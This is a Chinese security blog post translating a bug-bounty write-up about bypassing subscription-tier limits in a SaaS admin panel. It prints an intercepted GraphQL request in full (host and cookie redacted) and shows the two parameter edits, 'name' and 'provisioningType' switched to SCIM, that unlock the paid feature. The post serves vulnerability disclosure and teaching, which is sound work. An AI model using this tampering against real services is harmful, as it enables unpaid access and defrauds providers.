声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
博客新域名:https://gugesay.com
不想错过任何消息?设置星标↓ ↓ ↓
前言
众所周知,很多订阅产品的管理页面中包含许多功能,如使用情况、数据、用户、访问等管理。
今天分享一个国外利用业务逻辑缺陷打破订阅时限限制的案例,废话不多说,让我们开始吧。
漏洞详情
白帽小哥偶然间发现了一个带有Authentication Domains用户管理的界面,正如下面所看到的,该界面用于创建身份验证域或重命名默认名称或更改内容:
于此同时白帽小哥还发现使用此界面可以订阅专业计划:
经过一番测试,白帽小哥最终发现绕过方法。
首先进入用户管理:
接着点击用户设置按钮:
然后更改此处的值并拦截请求:
通过该请求,可以发现使用了 graphql :
POST /graphql HTTP/2
Host: redacted.com
Cookie: xxxxxxxxxxxxx
Content-Length: 2723
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: /
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: <https://redacted.com>
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <https://redacted.com/>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
{"operationName":"AuthenticationDomainUpdateMutation","variables":{"includeScimConfiguration":false,"includeSamlConfiguration":false,"id":"d937a430-7593-4b86-b073-a14dcd20a229","name":"momen0x00","authenticationType":"PASSWORD","provisioningType":"MANUAL","basicFullTierChangeApproval":"ADMIN_REVIEW","coreFullTierChangeApproval":"ADMIN_REVIEW","basicCoreTierChangeApproval":"ADMIN_REVIEW","idpManagedAttributes":[],"upgradeMessage":null,"upgradeButtonText":null,"upgradeButtonTargetUrl":null,"maxBrowserSessionDuration":2592000,"maxBrowserIdleDuration":604800},"query":"mutation AuthenticationDomainUpdateMutation($id: ID!, $name: String, $currentSamlConfigurationId: String, $currentScimConfigurationId: String, $authenticationType: String, $provisioningType: String, $maxBrowserSessionDuration: Int, $maxBrowserIdleDuration: Int, $basicCoreTierChangeApproval: String, $basicFullTierChangeApproval: String, $coreFullTierChangeApproval: String, $includeScimConfiguration: Boolean = false, $includeSamlConfiguration: Boolean = false, $postUpdateActions: [PostUpdateActions], $idpManagedAttributes: [IdpManagedAttributes], $upgradeMessage: String, $upgradeButtonText: String, $upgradeButtonTargetUrl: String) {\\n updateAuthenticationDomain(\\n input: {id: $id, name: $name, currentSamlConfigurationId: $currentSamlConfigurationId, currentScimConfigurationId: $currentScimConfigurationId, authenticationType: $authenticationType, provisioningType: $provisioningType, maxBrowserSessionDuration: $maxBrowserSessionDuration, maxBrowserIdleDuration: $maxBrowserIdleDuration, basicCoreTierChangeApproval: $basicCoreTierChangeApproval, basicFullTierChangeApproval: $basicFullTierChangeApproval, coreFullTierChangeApproval: $coreFullTierChangeApproval, postUpdateActions: $postUpdateActions, idpManagedAttributes: $idpManagedAttributes, upgradeMessage: $upgradeMessage, upgradeButtonText: $upgradeButtonText, upgradeButtonTargetUrl: $upgradeButtonTargetUrl}\\n ) {\\n id\\n name\\n authenticationType\\n provisioningType\\n maxBrowserSessionDuration\\n maxBrowserIdleDuration\\n basicCoreTierChangeApproval\\n basicFullTierChangeApproval\\n coreFullTierChangeApproval\\n idpManagedAttributes\\n upgradeMessage\\n upgradeButtonText\\n upgradeButtonTargetUrl\\n currentSamlConfiguration @include(if: $includeSamlConfiguration) {\\n idpSsoTargetUrl\\n logoutRedirectUrl\\n certificate\\n certificateFilename\\n assertionConsumerUrl\\n spEntityId\\n idpEntityId\\n idpMetadata\\n __typename\\n }\\n currentScimConfiguration @include(if: $includeScimConfiguration) {\\n authenticationDomainId\\n createdAt\\n __typename\\n }\\n __typename\\n }\\n}\\n"}
通过修改以下参数:
"name":"DEFAULT" 修改为 "name":"BUG"
"provisioningType":"Manual", 修改为 "provisioningType":"SCIM"
而后发送请求后至 Auth Domain 界面:
可以看到,成功绕过订阅限制。
以上内容由骨哥进行翻译并整理,希望对你有所收获。
原文:https://0xmatrix.medium.com/hacking-the-system-how-i-beat-subscription-restrictions-in-admin-controls-5684fd90279a
加入星球,随时交流:
(前50位成员):99元/年
(后续会员定价):128元/年
感谢阅读,如果觉得还不错的话,欢迎分享给更多喜爱的朋友~
====正文结束====